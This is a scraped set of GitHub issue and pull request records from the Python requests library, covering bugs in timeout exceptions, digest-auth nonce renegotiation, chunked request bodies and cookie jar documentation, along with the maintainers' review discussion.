{ "avatar_url": "https://avatars.githubusercontent.com/u/119893?v=4", "events_url": "https://api.github.com/users/kennethreitz/events{/privacy}", "followers_url": "https://api.github.com/users/kennethreitz/followers", "following_url": "https://api.github.com/users/kennethreitz/following{/other_user}", "gists_url": "https://api.github.com/users/kennethreitz/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/kennethreitz", "id": 119893, "login": "kennethreitz", "node_id": "MDQ6VXNlcjExOTg5Mw==", "organizations_url": "https://api.github.com/users/kennethreitz/orgs", "received_events_url": "https://api.github.com/users/kennethreitz/received_events", "repos_url": "https://api.github.com/users/kennethreitz/repos", "site_admin": false, "starred_url": "https://api.github.com/users/kennethreitz/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/kennethreitz/subscriptions", "type": "User", "url": "https://api.github.com/users/kennethreitz", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2393/reactions" }
https://api.github.com/repos/psf/requests/issues/2393/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2393.diff", "html_url": "https://github.com/psf/requests/pull/2393", "merged_at": "2015-01-27T18:24:34Z", "patch_url": "https://github.com/psf/requests/pull/2393.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2393" }
true
[ "Looks fine, modulo a test. =)\n", "where does the list of safe characters come from? maybe this could be pulled into a named var for clarity?\n", "## It comes from the RFCs\n\nSent from my Android device with K-9 Mail. Please excuse my brevity.\n", "Update?\n", "Update: forgotten. I've been really busy lately but I'll prioritize this. Sorry for losing track of it.\n", "Added two tests and gave the strings slightly better names. Not sure we need to spell out every last RFC referenced in the comments though since they're all pretty well known. @Lukasa I'd appreciate some review.\n", "Some small notes. =)\n", "@Lukasa forgot to mention this was updated to address your feedback.\n", "LGTM. :+1: \n" ]
https://api.github.com/repos/psf/requests/issues/2392
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2392/labels{/name}
https://api.github.com/repos/psf/requests/issues/2392/comments
https://api.github.com/repos/psf/requests/issues/2392/events
https://github.com/psf/requests/issues/2392
52,934,168
MDU6SXNzdWU1MjkzNDE2OA==
2,392
requests.exceptions.ReadTimeout is not raised when response is chunked
{ "avatar_url": "https://avatars.githubusercontent.com/u/1444666?v=4", "events_url": "https://api.github.com/users/nickjoyce-wf/events{/privacy}", "followers_url": "https://api.github.com/users/nickjoyce-wf/followers", "following_url": "https://api.github.com/users/nickjoyce-wf/following{/other_user}", "gists_url": "https://api.github.com/users/nickjoyce-wf/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/nickjoyce-wf", "id": 1444666, "login": "nickjoyce-wf", "node_id": "MDQ6VXNlcjE0NDQ2NjY=", "organizations_url": "https://api.github.com/users/nickjoyce-wf/orgs", "received_events_url": "https://api.github.com/users/nickjoyce-wf/received_events", "repos_url": "https://api.github.com/users/nickjoyce-wf/repos", "site_admin": false, "starred_url": "https://api.github.com/users/nickjoyce-wf/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/nickjoyce-wf/subscriptions", "type": "User", "url": "https://api.github.com/users/nickjoyce-wf", "user_view_type": "public" }
[ { "color": "e10c02", "default": false, "description": null, "id": 117744, "name": "Bug", "node_id": "MDU6TGFiZWwxMTc3NDQ=", "url": "https://api.github.com/repos/psf/requests/labels/Bug" }, { "color": "e102d8", "default": false, "description": null, "id": 117745, "name": "Planned", "node_id": "MDU6TGFiZWwxMTc3NDU=", "url": "https://api.github.com/repos/psf/requests/labels/Planned" }, { "color": "eb6420", "default": false, "description": null, "id": 44501256, "name": "Breaking API Change", "node_id": "MDU6TGFiZWw0NDUwMTI1Ng==", "url": "https://api.github.com/repos/psf/requests/labels/Breaking%20API%20Change" } ]
open
false
null
[]
{ "closed_at": null, "closed_issues": 29, "created_at": "2013-11-17T11:29:34Z", "creator": { "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" }, "description": null, "due_on": null, "html_url": "https://github.com/psf/requests/milestone/20", "id": 487518, "labels_url": "https://api.github.com/repos/psf/requests/milestones/20/labels", "node_id": "MDk6TWlsZXN0b25lNDg3NTE4", "number": 20, "open_issues": 12, "state": "open", "title": "3.0.0", "updated_at": "2024-05-19T18:43:00Z", "url": "https://api.github.com/repos/psf/requests/milestones/20" }
5
2014-12-26T18:19:10Z
2018-01-12T23:43:42Z
null
NONE
null
https://gist.github.com/nickjoyce-wf/c536f2573ef124115f86 When a request has a timeout param supplied and the response is chunked but does not return enough data in time, `requests.exceptions.ReadTimeout` should be raised. ``` shell $ mkvirtualenv test (test)$ pip install requests werkzeug (test)$ python server.py ``` In another terminal: ``` shell $ workon test (test)$ python client.py ``` Expected results: `requests.exceptions.ReadTimeout` is raised due to response not being sent within the timeout specified by `requests.get`. Actual results: ``` Traceback (most recent call last): File "client.py", line 3, in <module> requests.get('http://127.0.0.1:8000/', timeout=0.5) File "/Users/nick/.virtualenvs/test/lib/python2.7/site-packages/requests/api.py", line 65, in get return request('get', url, **kwargs) File "/Users/nick/.virtualenvs/test/lib/python2.7/site-packages/requests/api.py", line 49, in request response = session.request(method=method, url=url, **kwargs) File "/Users/nick/.virtualenvs/test/lib/python2.7/site-packages/requests/sessions.py", line 461, in request resp = self.send(prep, **send_kwargs) File "/Users/nick/.virtualenvs/test/lib/python2.7/site-packages/requests/sessions.py", line 610, in send r.content File "/Users/nick/.virtualenvs/test/lib/python2.7/site-packages/requests/models.py", line 730, in content self._content = bytes().join(self.iter_content(CONTENT_CHUNK_SIZE)) or bytes() File "/Users/nick/.virtualenvs/test/lib/python2.7/site-packages/requests/models.py", line 662, in generate raise ConnectionError(e) requests.exceptions.ConnectionError: HTTPConnectionPool(host='127.0.0.1', port=8000): Read timed out. ``` Recorded http request/response via Wireshark: ``` GET / HTTP/1.1 Host: 127.0.0.1:8000 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: */* User-Agent: python-requests/2.5.1 CPython/2.7.9 Darwin/13.4.0 HTTP/1.0 200 OK Content-type: text/plain Transfer-Encoding: chunked Connection: close Server: Werkzeug/0.9.6 Python/2.7.9 Date: Fri, 26 Dec 2014 17:51:21 GMT ``` Tested with requests==2.5.1
null
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2392/reactions" }
https://api.github.com/repos/psf/requests/issues/2392/timeline
null
null
null
null
false
[ "Just to be really clear, the bug here is that exception we're raising is wrong. We're raising a `ConnectionError`, not a `ReadTimeoutError`.\n", "At this point though, people are almost certainly wrapping their code in except blocks for `ConnectionError` but most likely not in [`ReadTimeout`](https://github.com/kennethreitz/requests/blob/2d1ffad80bdfbefcb1922e0129fca28d493d3fb0/requests/exceptions.py#L62). We can't exactly just change this under their feet in 2.5.x, or 2.x. We'll have to wait for 3.0 for this.\n", "Can an exception be thrown when access response content i.e:\ncontent = r.text\n\ncan the above statement throw the following exception:\nrequests.exceptions.ConnectionError: HTTPConnectionPool(host='<some website>', port=80): Read timed out\n", "Yes, if you set `stream=True`. Otherwise, no.\n\nIn future, it's better if you can ask these questions on Stack Overflow: this issue tracker is really meant for bugs only. =)\n", "> people are almost certainly wrapping their code in except blocks for `ConnectionError` but most likely not in `ReadTimeout`\r\n\r\nOn contrary, people who set timeout are most likely wrapping their code in except blocks for `ReadTimeout` already, because this exception is thrown from the send request function." ]
https://api.github.com/repos/psf/requests/issues/2391
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2391/labels{/name}
https://api.github.com/repos/psf/requests/issues/2391/comments
https://api.github.com/repos/psf/requests/issues/2391/events
https://github.com/psf/requests/issues/2391
52,846,724
MDU6SXNzdWU1Mjg0NjcyNA==
2,391
Using python-nss for SSL
{ "avatar_url": "https://avatars.githubusercontent.com/u/1172008?v=4", "events_url": "https://api.github.com/users/mrniranjan/events{/privacy}", "followers_url": "https://api.github.com/users/mrniranjan/followers", "following_url": "https://api.github.com/users/mrniranjan/following{/other_user}", "gists_url": "https://api.github.com/users/mrniranjan/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/mrniranjan", "id": 1172008, "login": "mrniranjan", "node_id": "MDQ6VXNlcjExNzIwMDg=", "organizations_url": "https://api.github.com/users/mrniranjan/orgs", "received_events_url": "https://api.github.com/users/mrniranjan/received_events", "repos_url": "https://api.github.com/users/mrniranjan/repos", "site_admin": false, "starred_url": "https://api.github.com/users/mrniranjan/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/mrniranjan/subscriptions", "type": "User", "url": "https://api.github.com/users/mrniranjan", "user_view_type": "public" }
[ { "color": "777777", "default": false, "description": null, "id": 162780722, "name": "Question/Not a bug", "node_id": "MDU6TGFiZWwxNjI3ODA3MjI=", "url": "https://api.github.com/repos/psf/requests/labels/Question/Not%20a%20bug" } ]
closed
true
null
[]
null
1
2014-12-25T04:13:48Z
2021-09-08T23:06:14Z
2014-12-25T09:12:44Z
NONE
resolved
For HTTPS urls where Ceritifcate verification is required, I would like to use certificates/keys stored in NSS database(Mozilla NSS), There is python-nss module which provides the interface to access the NSS Database. Is there a way i can use requests module to use python-nss. Any hints on how to achieve this would be helpful.
{ "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2391/reactions" }
https://api.github.com/repos/psf/requests/issues/2391/timeline
null
completed
null
null
false
[ "Currently, requests cannot use python-nss directly. Assuming all you want to do is use the certificates and keys, you'll need to transform them into a `.pem` file that OpenSSL can read. That's extremely painful, I'm afraid, as OpenSSL does not let you pass it `.pem` files in memory.\n\nUnfortunately, enhancing requests to do this is extremely tricky and really needs to be done lower down the stack. At this time, there is no plan to do that work: certainly not in the requests project.\n\nI'm sorry I can't be more helpful.\n" ]
https://api.github.com/repos/psf/requests/issues/2390
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2390/labels{/name}
https://api.github.com/repos/psf/requests/issues/2390/comments
https://api.github.com/repos/psf/requests/issues/2390/events
https://github.com/psf/requests/pull/2390
52,821,935
MDExOlB1bGxSZXF1ZXN0MjY1NjA1OTQ=
2,390
Clean up cookie docstrings, document cookie jar.
{ "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" }
[]
closed
true
null
[]
null
4
2014-12-24T14:35:19Z
2021-09-08T09:01:03Z
2014-12-24T15:15:37Z
MEMBER
resolved
Following on from [a Stack Overflow question](https://stackoverflow.com/questions/27586779/requests-inability-to-handle-two-cookies-with-same-name-different-domain), this PR extends our cookie documentation [here](http://docs.python-requests.org/en/latest/api/#cookies) to document the cookie jar itself. This should make it more likely that users are able to discover how to make more subtle queries about cookies.
{ "avatar_url": "https://avatars.githubusercontent.com/u/119893?v=4", "events_url": "https://api.github.com/users/kennethreitz/events{/privacy}", "followers_url": "https://api.github.com/users/kennethreitz/followers", "following_url": "https://api.github.com/users/kennethreitz/following{/other_user}", "gists_url": "https://api.github.com/users/kennethreitz/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/kennethreitz", "id": 119893, "login": "kennethreitz", "node_id": "MDQ6VXNlcjExOTg5Mw==", "organizations_url": "https://api.github.com/users/kennethreitz/orgs", "received_events_url": "https://api.github.com/users/kennethreitz/received_events", "repos_url": "https://api.github.com/users/kennethreitz/repos", "site_admin": false, "starred_url": "https://api.github.com/users/kennethreitz/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/kennethreitz/subscriptions", "type": "User", "url": "https://api.github.com/users/kennethreitz", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2390/reactions" }
https://api.github.com/repos/psf/requests/issues/2390/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2390.diff", "html_url": "https://github.com/psf/requests/pull/2390", "merged_at": "2014-12-24T15:15:37Z", "patch_url": "https://github.com/psf/requests/pull/2390.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2390" }
true
[ "A couple comments. I'm also wondering if there would be use in the toolbelt for a class that extends this so that you can do \n\n```\ns.cookies['cookie-name', 'domain', 'path']\n```\n\nIf you use the custom cookie-jar. I do and don't like it. Alternatively, we could just include the recipe for the user in the documentation. It's not hard\n\n``` python\nclass SpecialJar(requests.cookies.RequestsCookieJar):\n def __getitem__(self, name):\n if isinstance(name, str):\n return self._find_no_duplicates(name)\n if not isinstance(name, tuple):\n raise ValueError(\"Expected a string or a tuple but received {0}\".format(type(name)))\n if len(name) == 2:\n path = None\n cookie_name, domain = name\n elif len(name) == 3:\n cookie_name, domain, path = name\n # Raise another ValueError in an else?\n\n return self._find_no_duplicates(cookie_name, domain=domain, path=path)\n```\n", "Updates made.\n\nAs for the toolbelt extension, that might be worthwhile, though I'm not sure I see the advantage. `.get()` is surely more natural (or at least seems that way to me).\n", "Yeah it seems that way to me too. My problem with it is that default comes before domain and path so I expect people will not realize they need to use the keywords for domain and path to skip using a default.\n", "Yeah, that's true, but it means that those who think `Session.cookies` is a dict get the behaviour they expect. Lesser of two evils, IMO.\n" ]
https://api.github.com/repos/psf/requests/issues/2389
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2389/labels{/name}
https://api.github.com/repos/psf/requests/issues/2389/comments
https://api.github.com/repos/psf/requests/issues/2389/events
https://github.com/psf/requests/pull/2389
52,755,390
MDExOlB1bGxSZXF1ZXN0MjY1MTk3OTU=
2,389
Fix bug in renegotiating a nonce with the server
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
[]
closed
true
null
[]
null
5
2014-12-23T16:43:36Z
2021-09-08T09:01:06Z
2014-12-23T17:40:35Z
CONTRIBUTOR
resolved
If a session runs long enough (without constant activity) then the server can expire the nonce the session has negotiated. If that happens the session will get a new 401 response which we were immediately returning to the user. A user would then have to essentially reinitialize session.auth each time they get an unexpected 401. Also, there's no need for setattr calls when we can simply assign the attribute on the instance.
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2389/reactions" }
https://api.github.com/repos/psf/requests/issues/2389/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2389.diff", "html_url": "https://github.com/psf/requests/pull/2389", "merged_at": "2014-12-23T17:40:35Z", "patch_url": "https://github.com/psf/requests/pull/2389.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2389" }
true
[ "LGTM. :cake:\n", "@Lukasa I'm just waiting for @Jaypipes to verify this fixes their issues.\n", "@sigmavirus24 I have now verified that this fixes the issue I was seeing. Thanks very much! :)\n", "Cool. @Lukasa I'm going to cut 2.5.1 with this because it's a rather serious bug. (I have to wonder if it could be considered a CVE because someone could perform a denial of service on a client if it knows the clients behaviour and when to expire the nonce.)\n", "Fine by me.\n" ]
https://api.github.com/repos/psf/requests/issues/2388
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2388/labels{/name}
https://api.github.com/repos/psf/requests/issues/2388/comments
https://api.github.com/repos/psf/requests/issues/2388/events
https://github.com/psf/requests/pull/2388
52,699,213
MDExOlB1bGxSZXF1ZXN0MjY0ODc0MTc=
2,388
Handle empty chunks
{ "avatar_url": "https://avatars.githubusercontent.com/u/1743810?v=4", "events_url": "https://api.github.com/users/neosab/events{/privacy}", "followers_url": "https://api.github.com/users/neosab/followers", "following_url": "https://api.github.com/users/neosab/following{/other_user}", "gists_url": "https://api.github.com/users/neosab/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/neosab", "id": 1743810, "login": "neosab", "node_id": "MDQ6VXNlcjE3NDM4MTA=", "organizations_url": "https://api.github.com/users/neosab/orgs", "received_events_url": "https://api.github.com/users/neosab/received_events", "repos_url": "https://api.github.com/users/neosab/repos", "site_admin": false, "starred_url": "https://api.github.com/users/neosab/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/neosab/subscriptions", "type": "User", "url": "https://api.github.com/users/neosab", "user_view_type": "public" }
[ { "color": "e102d8", "default": false, "description": null, "id": 117745, "name": "Planned", "node_id": "MDU6TGFiZWwxMTc3NDU=", "url": "https://api.github.com/repos/psf/requests/labels/Planned" }, { "color": "eb6420", "default": false, "description": null, "id": 44501256, "name": "Breaking API Change", "node_id": "MDU6TGFiZWw0NDUwMTI1Ng==", "url": "https://api.github.com/repos/psf/requests/labels/Breaking%20API%20Change" }, { "color": "e11d21", "default": false, "description": null, "id": 78002701, "name": "Do Not Merge", "node_id": "MDU6TGFiZWw3ODAwMjcwMQ==", "url": "https://api.github.com/repos/psf/requests/labels/Do%20Not%20Merge" } ]
closed
true
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
[ { "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" } ]
{ "closed_at": null, "closed_issues": 29, "created_at": "2013-11-17T11:29:34Z", "creator": { "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" }, "description": null, "due_on": null, "html_url": "https://github.com/psf/requests/milestone/20", "id": 487518, "labels_url": "https://api.github.com/repos/psf/requests/milestones/20/labels", "node_id": "MDk6TWlsZXN0b25lNDg3NTE4", "number": 20, "open_issues": 12, "state": "open", "title": "3.0.0", "updated_at": "2024-05-19T18:43:00Z", "url": "https://api.github.com/repos/psf/requests/milestones/20" }
9
2014-12-22T23:19:34Z
2021-09-08T07:00:55Z
2015-06-05T12:33:56Z
NONE
resolved
Empty chunk in request body could prematurely signal end of chunked transmission. As a result, the terminating zero-size chunk sent by 'requests' can be interpretted as bad request by the recepient. I have used the same logic used by httplib to handle such cases. Please review this and comment.
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2388/reactions" }
https://api.github.com/repos/psf/requests/issues/2388/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2388.diff", "html_url": "https://github.com/psf/requests/pull/2388", "merged_at": null, "patch_url": "https://github.com/psf/requests/pull/2388.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2388" }
true
[ "Thanks for this!\n\nThe logic doesn't look quite right. Here, if we get an empty section from a generator, we stop sending the chunked body altogether. That doesn't seem like the correct logic to me. We should really do one of two things:\n1. Throw an exception. This means that users need to not send us empty chunks. This has the advantage of correctness, in that users are forced to choose what the correct behaviour is for empty chunks. It has the disadvantage of being annoying.\n2. Skip the chunk. We cannot emit it, that would be incorrect, so the only way to 'muddle on through' is to skip it. This has the advantage of continuing to work in the majority of cases, and the disadvantage of being a bit surprising in the remainder, where we send something other than what the user provided us.\n\nIf we want to do option 2, that means changing `break` for `continue`. @sigmavirus24, thoughts?\n", "Thanks for your comments.\n\nI agree that throwing an exception would be annoying. I noticed this issue when we were uploading a file with size being an exact multiple of our chunk size. We processed the EOF as an empty chunk and noticed broken-pipe errors all over the place in the server logs. We noticed this behavior after switching to requests and immediately fixed our code to stop sending EOF as a chunk. \n\nI do not think skipping the chunk is right either for the same reason you mentioned. We were earlier using httplib and hence proposed to a similar solution to stop sending altogether.\n\nLet me wait for more comments.\n", "So I had to re-read the [RFC section on Chunked Transfer Coding](http://tools.ietf.org/html/rfc7230#section-4.1) to make sure I remembered it correctly. The ABNF states: \n\n```\nlast-chunk = 1*(\"0\") [ chunk-ext ] CRLF\n```\n\nIn other words, the chunk that terminates a connect looks like\n\n```\n0\\r\\n\n```\n\nWhat we're essentially sending now is\n\n```\n0\\r\\n\\r\\n\n0\\r\\n\\r\\n\n```\n\nWhich is wrong.\n\nFrankly, I _really_ want this to throw an exception but I know that no one will like it. I think this especially causes problems if people are simply passing data through from a consumer of theirs. I think right now using `break` makes sense until we can come up with a more sensible way of doing this. ~~Also, I think we need to edit L398 to stop sending `0\\r\\n\\r\\n` because that doesn't appear correct (based on the RFC).~~ Edit: I just reread the ABNF for the entirety of the chunked body and the second `CRLF` is correct. Ignore me.\n", "I think I want this to throw an exception as well. It's annoying, but it's very Zen of Python (resist the temptation to guess etc. etc.).\n", "So either way we do this, the behaviour is _technically_ backwards incompatible. Right now, someone (trust me, I don't know who but this is oh so very plausible) is relying on us to:\n1. Not throw an exception, and\n2. Not skip empty chunks\n\nI really want this to be something we address but I don't think we can do so before 3.0. We should document this before 3.0 and perhaps start issuing a warning if we see an empty chunk so people can adjust, etc. before then. That said, I'm marking this as \"Do Not Merge\", \"Planned\", and adding the 3.0 milestone to it.\n", "Okay, we currently have 10 pull requests open for this project, many of which are labelled \"do not merge\". \n\nLet's get this cleaned up. \n", "@neosab can you resubmit this against the `proposed/3.0` branch?\n", "@sigmavirus24 Resubmitted this against proposed/3.0.0 branch in https://github.com/kennethreitz/requests/pull/2631\n", "Thanks @neosab! I'm closing this as a duplicate of #2631. Cheers! :sparkles: \n" ]
https://api.github.com/repos/psf/requests/issues/2387
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2387/labels{/name}
https://api.github.com/repos/psf/requests/issues/2387/comments
https://api.github.com/repos/psf/requests/issues/2387/events
https://github.com/psf/requests/issues/2387
52,582,146
MDU6SXNzdWU1MjU4MjE0Ng==
2,387
Request https url via http proxy
{ "avatar_url": "https://avatars.githubusercontent.com/u/3884436?v=4", "events_url": "https://api.github.com/users/RafTim/events{/privacy}", "followers_url": "https://api.github.com/users/RafTim/followers", "following_url": "https://api.github.com/users/RafTim/following{/other_user}", "gists_url": "https://api.github.com/users/RafTim/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/RafTim", "id": 3884436, "login": "RafTim", "node_id": "MDQ6VXNlcjM4ODQ0MzY=", "organizations_url": "https://api.github.com/users/RafTim/orgs", "received_events_url": "https://api.github.com/users/RafTim/received_events", "repos_url": "https://api.github.com/users/RafTim/repos", "site_admin": false, "starred_url": "https://api.github.com/users/RafTim/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/RafTim/subscriptions", "type": "User", "url": "https://api.github.com/users/RafTim", "user_view_type": "public" }
[]
closed
true
null
[]
null
3
